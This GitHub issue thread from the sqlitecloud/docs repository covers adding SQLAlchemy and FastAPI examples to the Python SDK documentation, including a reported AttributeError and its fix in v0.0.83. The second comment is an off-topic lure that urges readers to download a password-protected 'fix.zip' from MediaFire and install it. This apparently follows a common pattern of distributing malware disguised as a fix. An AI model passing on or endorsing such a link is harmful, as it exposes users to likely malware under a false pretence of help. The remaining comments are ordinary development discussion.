### ISSUE TITLE
docs / add sqlalchemy to python docs

### ISSUE THREAD

**Issue by jacobprall** [sqlitecloud/docs#92] opened 2024-08-26 17:30 UTC
Page to update -> https://github.com/sqlitecloud/docs/blob/main/sqlite-cloud/sdks/python/introduction.mdx
@danielebriggi -> Add demo of connecting, querying, and writing to/updating database
@jacobprall -> add context on pandas section and sqlalchemy section

**Comment by deverchettychandrashekar** [comment] 2024-08-26 17:34
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by unatarajan** [comment] 2024-08-27 01:26
I'm currently building an example using FastAPI/ SQLAlchemy to connect to my `chinook.sqlite` database in SQLite Cloud. I keep getting this error: `AttributeError: module 'sqlitecloud.dbapi2' has no attribute 'sqlite_version_info'`.

It may be the SQLAlchemy implementation, or my project structure/ local Python setup causing this issue. Will huddle with @danielebriggi this week to figure this out.

**Comment by unatarajan** [comment] 2024-08-28 05:03
Created/ merged [PR](https://github.com/sqlitecloud/docs/pull/70) with a working example of using SQLAlchemy with SQLite Cloud in the FastAPI framework.

**Comment by danielebriggi** [comment] 2024-08-28 08:23
I updated the sqlitecloud to v0.0.83 to include the fix. Can you please test it on FastAPI? thank you!

**Comment by unatarajan** [comment] 2024-08-28 20:44
I've merged a revised SQLAlchemy/ FastAPI Quickstart [PR](https://github.com/sqlitecloud/docs/pull/95). Revisions should be up on the Documentation site tomorrow.

Slacking with @danielebriggi about the `AttributeError` above. The app doesn't run on the first try because of this error. If I restart my IDE and re-run the app, there's no error and the app runs. Daniele will take a look at my Quickstart tom to try to reproduce the error.

**Comment by unatarajan** [comment] 2024-08-28 21:05
To be safe, also quickly checked 2 of the other Python Quickstarts (Django, Flask). They still work fine.

**Closed** 2024-09-09 21:21 UTC
Labels: documentation
